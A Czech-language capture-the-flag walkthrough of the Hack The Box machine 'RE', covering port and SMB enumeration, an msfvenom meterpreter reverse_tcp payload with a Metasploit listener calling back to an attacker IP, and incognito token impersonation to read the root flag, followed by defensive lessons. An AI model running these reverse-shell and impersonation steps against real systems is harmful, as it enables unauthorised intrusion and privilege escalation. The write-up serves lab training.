RE

Úvod a kontext

Na RE je nejzajímavější, jak se propojí reblog.htb, SMB sdílení a IIS.

Bez pochopení této návaznosti by nedával smysl ani shell získaný exploitací zranitelné služby, ani závěrečná lokální enumeraci po získání shellu.

Počáteční průzkum

Vyhledání otevřených portů

Nejprve mapuji veřejně dostupné služby, protože právě z otevřených portů odvodím, které protokoly a aplikace má smysl zkoumat detailněji.

ports=$(nmap -p- --min-rate=1000 -T4 $IP | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//);nmap -p $ports -A -sC -sV -v $IP

PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ghidra Dropbox Coming Soon!
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 58m40s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-12-24T00:03:16
|_  start_date: N/A

Enumerace webu

Ve webové vrstvě hledám neveřejné cesty, vývojové artefakty a chybně vystavené soubory, protože právě ty často prozradí technologii aplikace, interní workflow nebo přímo přístupové údaje.

dirb

DIRECTORY: http://10.10.10.144/aspnet_client/
DIRECTORY: http://10.10.10.144/aspnet_client/system_web/
http://10.10.10.144/index.html
==> DIRECTORY: http://reblog.htb/about/
==> DIRECTORY: http://reblog.htb/About/
==> DIRECTORY: http://reblog.htb/aspnet_client/
==> DIRECTORY: http://reblog.htb/assets/
+ http://reblog.htb/index.html (CODE:200|SIZE:4197)
+ http://reblog.htb/about/index.html (CODE:200|SIZE:3210)
+ http://reblog.htb/About/index.html (CODE:200|SIZE:3210)
DIRECTORY: http://reblog.htb/aspnet_client/system_web/

Enumerace SMB

U SMB sdílení ověřuji, jaká data jsou dostupná bez dalších oprávnění a zda z nich lze získat účty, dokumenty nebo konfigurační tajemství.

smbmap -u "root" -p "" -d workgroup -H $IP

Disk                                                    Permissions
----                                                    -----------
IPC$                                                    READ ONLY
malware_dropbox                                         READ ONLY

Získání přístupu

Získání user flagu

User flag zde slouží hlavně jako potvrzení, že už mám běžný uživatelský kontext a mohu pokračovat v lokální analýze systému.

more user.txt

__CENSORED__

Spuštění exploitu

V této fázi převádím předchozí zjištění do praktického kroku, který má vést k ověřitelnému přístupu nebo k dalším citlivým datům.

msfconsole

use exploit/multi/handler
set exitonsession false
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.14
run -j

Spuštění exploitu (2)

V této fázi převádím předchozí zjištění do praktického kroku, který má vést k ověřitelnému přístupu nebo k dalším citlivým datům.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=4444 -f exe -o test.exe

Eskalace oprávnění

Získání root flagu

Tento krok ukazuje, jak se nalezená slabina nebo chyba v delegaci oprávnění mění v privilegovaný přístup.

Impersonating

use incognito
list_tokens -u
impersonate_token "RE\\coby"

gc C:\users\administrator\desktop\root.txt
__CENSORED__

Shrnutí klíčových poznatků

• Počáteční průzkum se z obecné enumerace změnil v použitelný směr teprve po propojení indicií jako reblog.htb, SMB sdílení a IIS.
• User část stála na ověřeném kroku typu shell získaný exploitací zranitelné služby, ne na odhadu bez technického potvrzení.
• Závěrečná eskalace pak stála na tom, co představuje lokální enumerace po získání shellu, takže rozhodující byla práce s lokálním kontextem po footholdu.

Co si odnést do praxe

• Pokud se zanedbá oblast reblog.htb, SMB sdílení a IIS, vznikne stejný typ vstupu jako tady. SMB sdílení mají mít opravdu minimální ACL a průběžný audit obsahu; i read-only přístup často útočníkovi dá víc než samotná zranitelnost služby.
• Jakmile útočník ověří shell získaný exploitací zranitelné služby, je potřeba počítat s dlouhodobým přístupem. Jednorázové RCE je potřeba detekovat i na aplikační vrstvě; upload, template injection nebo command injection často vypadají v logu nenápadně, ale vedou ke stabilnímu shellu.
• Stejně důležitá je i obrana proti mechanice lokální enumerace po získání shellu. Po získání shellu je rozhodující systematická lokální enumerace; i bez další CVE často rozhodne kombinace špatných oprávnění, reuse tajemství a pomocných skriptů.